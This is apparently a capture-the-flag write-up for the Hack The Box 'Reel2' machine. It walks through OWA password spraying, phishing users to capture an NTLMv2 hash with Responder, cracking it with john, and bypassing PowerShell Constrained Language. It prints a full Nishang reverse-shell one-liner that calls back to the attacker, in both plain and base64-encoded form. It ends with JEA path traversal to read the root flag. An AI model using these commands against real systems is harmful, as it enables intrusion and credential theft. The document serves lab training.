Reel2
Enumeration
As always, we start with the enumeration phase, in which we try to scan the machine looking for open ports and finding out services and versions of those opened ports.
The following nmap command will scan the target machine looking for open ports in a fast way and saving the output into a file:
nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.210 -oN allPorts
-sSuse the TCP SYN scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.--min-rate 5000nmap will try to keep the sending rate at or above 5000 packets per second.-p-scanning the entire port range, from 1 to 65535.-T5insane mode, it is the fastest mode of the nmap time template.-Pnassume the host is online.-nscan without reverse DNS resolution.-oNsave the scan result into a file, in this case the allports file.
# Nmap 7.92 scan initiated Tue Sep 13 12:33:23 2022 as: nmap -sS --min-rate 5000 -n -Pn -p- -oN allPorts 10.10.10.210
Nmap scan report for 10.10.10.210
Host is up (0.045s latency).
Not shown: 65519 filtered tcp ports (no-response)
PORT STATE SERVICE
80/tcp open http
443/tcp open https
5985/tcp open wsman
6001/tcp open X11:1
6002/tcp open X11:2
6004/tcp open X11:4
6005/tcp open X11:5
6006/tcp open X11:6
6007/tcp open X11:7
6008/tcp open X11:8
6010/tcp open x11
6011/tcp open x11
6012/tcp open x11
6017/tcp open xmail-ctrl
6024/tcp open x11
8080/tcp open http-proxy
# Nmap done at Tue Sep 13 12:33:49 2022 -- 1 IP address (1 host up) scanned in 26.53 secondsNow that we know which ports are open, let's try to obtain the services and versions running on these ports. The following command will scan these ports more in depth and save the result into a file:
nmap -sC -sV -p80,443,5985,6001,6002,6004,6005,6006,6007,6008,6010,6011,6012,6017,6024,8080 10.10.10.210 -oN targeted
-sCperforms the scan using the default set of scripts.-sVenables version detection.-oNsave the scan result into file, in this case the targeted file.
# Nmap 7.92 scan initiated Tue Sep 13 12:44:45 2022 as: nmap -sCV -p80,443,5985,6001,6002,6004,6005,6006,6007,6008,6010,6011,6012,6017,6024,8080 -oN targeted 10.10.10.210
Nmap scan report for 10.10.10.210
Host is up (0.049s latency).
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 8.5
|_http-server-header: Microsoft-IIS/8.5
|_http-title: 403 - Forbidden: Access is denied.
443/tcp open ssl/http Microsoft IIS httpd 8.5
| http-methods:
|_ Potentially risky methods: TRACE
| ssl-cert: Subject: commonName=Reel2
| Subject Alternative Name: DNS:Reel2, DNS:Reel2.htb.local
| Not valid before: 2020-07-30T10:12:46
|_Not valid after: 2025-07-30T10:12:46
|_http-title: IIS Windows Server
|_http-server-header: Microsoft-IIS/8.5
|_ssl-date: 2022-09-13T10:45:54+00:00; +4s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
6001/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
6002/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
6004/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
6005/tcp open msrpc Microsoft Windows RPC
6006/tcp open msrpc Microsoft Windows RPC
6007/tcp open msrpc Microsoft Windows RPC
6008/tcp open msrpc Microsoft Windows RPC
6010/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
6011/tcp open msrpc Microsoft Windows RPC
6012/tcp open msrpc Microsoft Windows RPC
6017/tcp open msrpc Microsoft Windows RPC
6024/tcp open msrpc Microsoft Windows RPC
8080/tcp open http Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.2.32)
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
|_http-title: Welcome | Wallstant
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.2.32
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 3s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Sep 13 12:45:50 2022 -- 1 IP address (1 host up) scanned in 65.39 secondsWe can't access the website on port 80.
The HTTPS website shows the default IIS web server page.
If we do subdirectories enumeration, we'll see a OWA login page.
gobuster dir -u https://10.10.10.210 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -t 200 --no-error -x txt,php -k
direnumerates directories or files.-uthe target URL.-wpath to the wordlist.-tnumber of current threads, in this case 200 threads.-xfile extensions to search for.-kskips TLS certificate verification.
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: https://10.10.10.210
[+] Method: GET
[+] Threads: 200
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Extensions: txt,php
[+] Timeout: 10s
===============================================================
2022/09/14 14:22:50 Starting gobuster in directory enumeration mode
===============================================================
/public (Status: 302) [Size: 147] [--> https://10.10.10.210/owa]
/exchange (Status: 302) [Size: 147] [--> https://10.10.10.210/owa]
/Public (Status: 302) [Size: 147] [--> https://10.10.10.210/owa]
/rpc (Status: 401) [Size: 13]
/owa (Status: 301) [Size: 0] [--> /owa/]
/Exchange (Status: 302) [Size: 147] [--> https://10.10.10.210/owa]
/RPC (Status: 401) [Size: 13]
/ecp (Status: 301) [Size: 148] [--> https://10.10.10.210/ecp/]
/ews (Status: 301) [Size: 148] [--> https://10.10.10.210/ews/]
/PUBLIC (Status: 302) [Size: 147] [--> https://10.10.10.210/owa]
===============================================================
2022/09/14 14:25:15 Finished
===============================================================We'll see the login page in the /owa directory. But we don't have credentials yet.
The website on port 8080, shows a Wallstant application, that looks similar to Facebook.
Exploitation
Let's create a new account.
The main page shows a list of users.
We can get a list of all users registered in the app by searching for an empty space.
http://10.10.10.210:8080/search?q=
The following command will take all these users, and put them in a file called users.
curl -s "http://10.10.10.210:8080/search?q=" | grep user_follow_box_a | sed 's/u\// /g' | tr "\"" " " | sed 's/<p>/ /g' | awk '{print $7 " " $5}' > users
gregg quimbly
joseph Moore
teresa trump
cube cube
sven svensson
alex miller
michael doe
egre55 egre55
travis scott
davis marshall
alfa8sa alfa8sa
jeff Perez
frans allen
james Martin
stig helmer
donald Johson
jhon smith
chris Thompson
kalle garcia
cube0x0 cube0x0
lee rodriguez
jenny adams
david Taylor
jim morgan
lars larsson
bob davis
charles Jackson
fred sandersWe can make variants of the dictionary with the spindrift tool. Let's add to the dictionary the same users, but with the format {f}.{last}.
spindrift users --format {f}.{last} >> users
g.quimbly
j.moore
t.trump
c.cube
s.svensson
a.miller
m.doe
e.egre55
t.scott
d.marshall
j.perez
f.allen
j.martin
s.helmer
d.johson
j.smith
c.thompson
k.garcia
c.cube0x0
l.rodriguez
j.adams
d.taylor
j.morgan
l.larsson
b.davis
c.jackson
f.sandersOn the Wallstant app there are only two posts.
The second one is saying that the summer of 2020 was hot.
We could try the Summer2020 password to do a password spraying attack with atomizer, against the OWA login page we saw earlier, using the users dictionary.
atomizer owa 10.10.10.210 "Summer2020" users
[*] Trying to find autodiscover URL
[+] Using OWA autodiscover URL: https://10.10.10.210/autodiscover/autodiscover.xml
[+] OWA domain appears to be hosted internally
[+] Got internal domain name using OWA: HTB
[*] Starting spray at 2021-01-30 12:33:56 UTC
[-] Authentication failed: HTB\jmoore:Summer2020 (Invalid credentials)
[-] Authentication failed: HTB\gquimbly:Summer2020 (Invalid credentials)
...
[+] Found credentials: HTB\s.svensson:Summer2020
...
[+] Dumped 1 valid accounts to owa_valid_accounts.txtThe password Summer2020 is valid for the s.svensson user. Let's log in in the OWA login page.
As the website seems to be in Swedish, I will translate it to English with the Google Translator extension.
We could try to send an email to every contact available, which will contain a link to a HTTP server set by us. So if the user click on the link, we will see a request with some information. First, set a netcat listener on port 80.
nc -lvnp 80
-llisten mode.-vverbose mode.-nnumeric-only IP, no DNS resolution.-pspecify the port to listen on.
Now, go to the people picker, and select every user.
https://10.10.10.210/owa/?ae=PreFormAction&t=IPM.Note&a=PeoplePicker
Then sent an email with a link to http://10.10.14.11.
After a while, we should see a request from 10.10.10.210 on the netcat listener, which has a User-Agent header with the value Mozilla/5.0 (Windows NT; Windows NT 6.3; en-US) WindowsPowerShell/5.1.14409.1018.
listening on [any] 80 ...
connect to [10.10.14.11] from (UNKNOWN) [10.10.10.210] 54392
POST / HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 6.3; en-US) WindowsPowerShell/5.1.14409.1018
Content-Type: application/x-www-form-urlencoded
Host: 10.10.14.11
Content-Length: 0
Connection: Keep-AliveSome is trying to access a resource which doesn't exist. We could use responder to poison the request, and make the user authenticate against the responder, so we can get their NTLMv2 hash. Make sure to set the HTTP server to ON on the responder configuration file.
responder -I tun0
-Inetwork interface to use.
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|
NBT-NS, LLMNR & MDNS Responder 3.1.3.0
To support this project:
Patreon -> https://www.patreon.com/PythonResponder
Paypal -> https://paypal.me/PythonResponder
Author: Laurent Gaffie (laurent.gaffie@gmail.com)
To kill this script hit CTRL-C
[+] Poisoners:
LLMNR [ON]
NBT-NS [ON]
MDNS [ON]
DNS [ON]
DHCP [OFF]
[+] Servers:
HTTP server [ON]
HTTPS server [ON]
WPAD proxy [OFF]
Auth proxy [OFF]
SMB server [OFF]
Kerberos server [ON]
SQL server [ON]
FTP server [ON]
IMAP server [ON]
POP3 server [ON]
SMTP server [ON]
DNS server [ON]
LDAP server [ON]
RDP server [ON]
DCE-RPC server [ON]
WinRM server [ON]
[+] HTTP Options:
Always serving EXE [OFF]
Serving EXE [OFF]
Serving HTML [OFF]
Upstream Proxy [OFF]
[+] Poisoning Options:
Analyze Mode [OFF]
Force WPAD auth [OFF]
Force Basic Auth [OFF]
Force LM downgrade [OFF]
Force ESS downgrade [OFF]
[+] Generic Options:
Responder NIC [tun0]
Responder IP [10.10.14.11]
Responder IPv6 [dead:beef:2::1009]
Challenge set [random]
Don't Respond To Names ['ISATAP']
[+] Current Session Variables:
Responder Machine Name [WIN-49HJGZUL8KT]
Responder Domain Name [H6RX.LOCAL]
Responder DCE-RPC Port [48763]
[+] Listening for events...
[HTTP] Sending NTLM authentication request to 10.10.10.210
[HTTP] POST request from: ::ffff:10.10.10.210 URL: /
[HTTP] NTLMv2 Client : 10.10.10.210
[HTTP] NTLMv2 Username : htb\k.svensson
[HTTP] NTLMv2 Hash : k.svensson::htb:1cfa10872f3e3ef1:B194C796E5BD5D7F2FA2A3FD48D00564:01010000000000003C3144C33AC8D801C7544ABC3415A1660000000002000800410031004900590001001E00570049004E002D004200580049004D0039005400530034005000500039000400140041003100490059002E004C004F00430041004C0003003400570049004E002D004200580049004D0039005400530034005000500039002E0041003100490059002E004C004F00430041004C000500140041003100490059002E004C004F00430041004C000800300030000000000000000000000000400000B980194F732226BB7FA9ACB35492650E1BF3CF5F1EB3FD96BF6372E8ADB952C90A001000000000000000000000000000000000000900200048005400540050002F00310030002E00310030002E00310034002E00310031000000000000000000Let's try to break the hash with john.
john --wordlist=/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
kittycat1 (k.svensson)
1g 0:00:00:04 DONE (2022-09-14 15:07) 0.2347g/s 1682p/s 1682c/s 1682C/s horoscope..emoemo
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed.Now that we have credentials, as port 5985 (WinRM) is open we could try to get a shell with evil-winrm as the k.svensson user.
evil-winrm -i 10.10.10.210 -u "k.svensson" -p "kittycat1"
-iremote host IP address.-uusername.-ppassword.
Evil-WinRM shell v3.4
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS The term 'Invoke-Expression' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again. + CategoryInfo : ObjectNotFound: (Invoke-Expression:String) [], CommandNotFoundException + FullyQualifiedErrorId : CommandNotFoundException>But we can't execute commands because we get an error. But, if WinRM is available there is another way to get a shell. You will need to install powershell and gss-ntlmssp with apt. Then, open a shell with PowerShell.
pwsh
PowerShell 7.2.6
Copyright (c) Microsoft Corporation.
https://aka.ms/powershell
Type 'help' to get help.
PS /home/alfa8sa>Create a $pass secure string with the password kittycat1.
$pass = ConvertTo-SecureString 'kittycat1' -AsPlainText -Force
Create a $cred object with the htb\k.svensson and the $pass secure string.
$cred = New-Object System.Management.Automation.PSCredential('htb\k.svensson', $pass)
Finally, use Enter_PSSession to get a shell.
Enter-PSSession -Computer 10.10.10.210 -credential $cred -Authentication Negotiate
[10.10.10.210]: PS>whoami
The term 'whoami.exe' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.But we still can't execute commands. That's because we are in a ConstrainedLanguage shell.
$ExecutionContext.SessionState.LanguageMode
ConstrainedLanguageWe can only execute the following commands.
Get-Command
CommandType Name Version Source
----------- ---- ------- ------
Function Clear-Host
Function Exit-PSSession
Function Get-Command
Function Get-FormatData
Function Get-Help
Function Measure-Object
Function Out-Default
Function Select-ObjectBut, we can bypass this restriction by creating functions or with the & operator.
function getlocation {Get-Location}; getlocation
Path
----
C:\Users\k.svensson\DocumentsLet's get a proper shell. First, let's set a netcat listener on port 4444 with rlwrap.
rlwrap nc -lvnp 4444
-llisten mode.-vverbose mode.-nnumeric-only IP, no DNS resolution.-pspecify the port to listen on.
Now, I will make a file called shell with the TCP reverse shell one liner from the Nishang GitHub repository.
nano shell
$client = New-Object System.Net.Sockets.TCPClient('10.10.14.11',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()Then, encode the content as utf-16le, and the base64.
cat shell | iconv -t utf-16le | base64 -w 0
JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACcAMQAwAC4AMQAwAC4AMQA0AC4AMQAxACcALAA0ADQANAA0ACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACcAUABTACAAJwAgACsAIAAoAHAAdwBkACkALgBQAGEAdABoACAAKwAgACcAPgAgACcAOwAkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkACgA=If we execute the encoded string with PowerShell using the -enc argument, we should get a normal shell as the user.
& {powershell -enc JABjA...kACgA=}
listening on [any] 4444 ...
connect to [10.10.14.11] from (UNKNOWN) [10.10.10.210] 23245
PS C:\Users\k.svensson\Documents> whoami
htb\k.svensson
PS C:\Users\k.svensson\Documents> type \users\k.svensson\desktop\user.txt
545fc9d141cd31578f03049409c68e65Privilege Escalation
In the current directory there are a few configuration files.
dir \Users\k.svensson\Documents
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 7/30/2020 5:14 PM WindowsPowerShell
-a---- 7/31/2020 11:58 AM 5600 jea_test_account.psrc
-a---- 7/31/2020 11:58 AM 2564 jea_test_account.psscIf we check the jea_test_account.psrc file, we'll see a function called Check-File which checks the content of C:\ProgramData\.
type jea_test_account.psrc | Select-String -NotMatch "^#"
...
FunctionDefinitions = @{
'Name' = 'Check-File'
'ScriptBlock' = {param($Path,$ComputerName=$env:COMPUTERNAME) [bool]$Check=$Path -like "D:\*" -or $Path -like
"C:\ProgramData\*" ; if($check) {get-content $Path}} }
...As we can see jea_test_account.psrc is a user.
net user
-------------------------------------------------------------------------------
a.miller Administrator b.davis
c.jackson d.johson d.marshall
d.taylor e.marin f.allen
f.sanders g.quimbly Guest
j.adams j.johson j.marin
j.moore j.morgan j.perez
j.smith jea_test_account k.garcia
k.jackson k.svensson krbtgt
l.larsson l.rodriguez m.doe
m.moore r.jackson r.martin
r.tayor r.thompson s.helmer
s.mooire s.svensson SM_b1017128ac394c669
SM_b7973ae6f38e4d1b8 SM_d8c9a1c1fce54bca9 SM_fffa25e273cb4e9bb
t.martin t.scott t.trump
w.thompson
The command completed with one or more errors.This might be handy later. In the desktop folder there is a Sticky Notes.lnk file. We look for any credentials in the default Sticky Notes path.
cd \users\k.svensson\appdata\roaming\stickynotes
If we search recursively for the user jea_test_account.psrc, we'll see that there are some credentials inside the Local Storage\leveldb\000003.log file.
dir -recurse | select-string "jea_test_account"
...
<p>Credentials for JEA</p><p>jea_test_account:Ab!Q@vcg^%@#1</p>
...Let's try to get a shell as the user jea_test_account.psrc, the same way we did with k.svensson.
pwsh
$pass = ConvertTo-SecureString 'Ab!Q@vcg^%@#1' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('htb\jea_test_account', $pass)
Enter-PSSession -Computer 10.10.10.210 -credential $cred -Authentication Negotiate
Enter-PSSession: Connecting to remote server 10.10.10.210 failed with the following error message : ERROR_ACCESS_DENIED: Access is denied. For more information, see the about_Remote_Troubleshooting Help topic.But we get an error. This might happen because we have to include the configuration files we saw earlier.
Enter-PSSession -Computer 10.10.10.210 -credential $cred -Authentication Negotiate -ConfigurationName jea_test_account
[10.10.10.210]: PS>whoami
The term 'whoami.exe' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again. Now we get a shell, but we still can't execute normal commands. If we list what command we are able to use, we'll see the Check-File command we saw in the configuration file.
Get-Command
CommandType Name Version Source
----------- ---- ------- ------
Function Check-File
Function Clear-Host
Function Exit-PSSession
Function Get-Command
Function Get-FormatData
Function Get-Help
Function Measure-Object
Function Out-Default
Function Select-ObjectWith the Check-File command, we could see the content of C:\ProgramData\, but we could try to do a directory path traversal to reach the root flag. All we have to do is execute the following command, and reap the harvest and take the root flag.
Check-File C:\ProgramData..\Users\Administrator\Desktop\root.txt
2b4428ee3230ba53282e255244aad8d8Last updated
Was this helpful?